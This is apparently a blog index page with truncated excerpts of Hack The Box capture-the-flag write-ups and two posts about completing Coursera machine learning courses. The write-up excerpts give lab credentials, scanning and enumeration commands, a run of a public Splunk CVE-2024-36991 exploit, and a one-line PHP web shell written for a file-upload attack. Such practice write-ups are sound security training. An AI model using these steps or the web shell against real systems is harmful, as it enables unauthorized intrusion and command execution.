Welcome

User Flag For this box we are given the credentials: levi.james / KingofAkron2025!. Let’s start with some nmap scans: sudo nmap -p$ports -sC -sV -vv -oN nmap_scripts.out puppy.htb Looking at the SMB, we can find a DEV share, but we don’t have permissions: netexec smb puppy.htb -u usernames.txt -p passwords.txt --shares We can also find more users: Let’s collect some domain information with bloodhound: python ~/workspace/tools/BloodHound.py/bloodhound.py -d puppy.htb -c all -u 'levi....

User Flag In this machine we are given the credentials: j.fleischman / J0elTHEM4n1990! Started with nmap scans: sudo nmap -p- --min-rate=1000 -oN nmap.out fluffy.htb sudo nmap -p$ports -sC -sV -vv -oN nmap_scripts.out fluffy.htb Using netexec we find the following shares: netexec smb fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares We can read and write to the IT shares, let’s check the contents of the IT share: smbmap -H fluffy.htb --no-banner -u 'j....

User Flag This machine gives us default credentials: admin / 0D5oT70Fq13EvB5r Let’s start with the traditional nmap scans: sudo nmap -p- --min-rate=1000 -oN nmap.out 10.129.214.74 sudo nmap -p22,80 -sC -sV -vv -oN nmap_scripts.out 10.129.214.74 In port 80 we have a redirect to http://planning.htb We can also find the vhost grafana: ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -u http://planning.htb -H "Host: FUZZ.planning.htb" -fs 178 | tee ffuf_dns_namelist_planning.out We can use the credentials provided to login to grafana:...

User Flag We start the enumeration of the machine, by doing some nmap scans: sudo nmap -p- --min-rate=1000 -oN nmap.out 10.129.21.13 sudo nmap -p22,80 -sC -sV -vv -oN nmap_scripts.out 10.129.21.13 Only two ports are open, so let’s check the webapp running on port 80: It seems to be a web app that allows the upload of pdf, xslx, etc files. Let’s register and login to see if we can do anything with it: After, logging in and testing the upload functionality with an empty pdf, we are allowed to view the uploaded file:...

User Flag As usually I started my enumeration with some nmap scans: sudo nmap -p- --min-rate=1000 -oN nmap.out 10.129.23.9 sudo nmap -p22,5000 -sC -sV -vv -oN nmap_scripts.out 10.129.23.94 We see two ports open: 22, 5000. Using the browser to make an http request to port 5000, we get what it seems to be a python interpreter. We are allowed to run some code, but there are a lot of restricted keywords....

Another certification completed, this time is the Deep Learning Specialization from DeepLearning.AI, taught by Andrew Ng on Coursera. This five-course program covered the core areas of deep learning, from foundational concepts to advanced architectures. I started by learning how to build and train basic neural networks, then moved on to techniques for improving model performance, including hyperparameter tuning, regularization, and optimization methods. The specialization also included best practices for structuring machine learning projects and debugging common issues....

User Flag We start the machine by doing some nmap scans: There seems to only be a RDP port open, since we have nothing else to go by, let’s try some default credentials: xfreerdp /v:10.129.157.255 /dynamic-resolution -sec-nla The server is running in kiosk mode, with the user KioskUser0, without a password: We can enter “windows key” to open the start menu: We can open the edge browser: And access the file system through it:...

User Flag Started by doing some nmap scans: sudo nmap -p- --min-rate=1000 -oN nmap.out haze.htb sudo nmap -p$ports -sC -sV -vv -oN nmap_scripts.out haze.htb In port 8000 we find a splunk service: And in port 8089 we can find the version of splunk: It appears that this version has a critical vulnerability: https://www.sonicwall.com/blog/critical-splunk-vulnerability-cve-2024-36991-patch-now-to-prevent-arbitrary-file-reads Let’s try to exploit it: https://github.com/bigb0x/CVE-2024-36991 python CVE-2024-36991.py -u http://haze.htb:8000 We are unable to crack the hashes, but we find 3 potencial users: edward,mark and paul....

User Flag Nmap scans: sudo nmap -p- --min-rate=1000 -oN nmap.out hospital.htb sudo nmap -p$ports -sC -sV -vv -oN nmap_scripts.out hospital.htb Navigating to port 8080: After registering an account, we have access to a file upload feature: Since this is a PHP web application, let’s try uploading a PHP web shell: echo '<?php system($_REQUEST["cmd"]); ?>' > ./shell.php We can intercept the request: And notice that is redirecting to /failed.php: Trying some common php extensions leads us to a /success....

I’ve just completed the Machine Learning Specialization on Coursera. This program is taught by Andrew Ng and jointly offered by DeepLearning.AI and Stanford Online. The specialization is structured as a three-course sequence, each designed to build a strong foundation and progressively expand your understanding of machine learning. The first course, Supervised Machine Learning: Regression and Classification, dives into the core ideas behind predictive modeling. I learned how to implement linear and logistic regression, understand loss functions, optimize models using gradient descent, and build simple neural networks....